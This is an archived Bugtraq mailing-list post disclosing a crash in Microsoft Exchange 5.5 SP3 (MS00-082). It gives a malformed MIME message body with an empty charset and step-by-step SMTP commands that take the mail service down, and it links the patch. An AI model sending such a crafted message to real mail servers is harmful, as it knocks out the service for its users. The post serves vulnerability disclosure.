Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Exploit scenario: Microsoft Security Bulletin (MS00-082)
From: Art Savelev <asavelev () ENI-NET COM>
Date: Fri, 10 Nov 2000 15:49:51 -0500
The following body of the e-mail message causes Microsoft Exchange 5.5
SP3 Internet Mail Service and Information Store to crash
Refer to Microsoft Security Bulletin (MS00-082)
(http://www.microsoft.com/technet/security/bulletin/ms00-082.asp).
Patch is available here:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25443.

The source of the problem is charset = ""

Body:

MIME-Version: 1.0

Content-Type: multipart/alternative;

     boundary="=_ Boundary 1-KTwEv4jY84Hk"

--=_ Boundary 1-KTwEv4jY84Hk

Content-Type: text/plain;

        charset = ""

Content-Transfer-Encoding: 7bit

This message is test

--=_ Boundary 1-KTwEv4jY84Hk--

Scenario:
1) Connect to 25th port of server (SMTP)
2) Enter (paste) following text:

HELO

MAIL FROM: myself () myserver com

RCPT TO: administrator

DATA

3) Now paste the body I gave
4) Type <CRLF>.<CRLF> (that is Enter-dot-Enter)
5) Type quit
6) Wait a little, and try to connect to 25th port again to verify - it
shouldn't work.

--
Art Savelev
http://www.savelev.com

  By Date           By Thread  

Current thread:
  • Exploit scenario: Microsoft Security Bulletin (MS00-082) Art Savelev (Nov 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]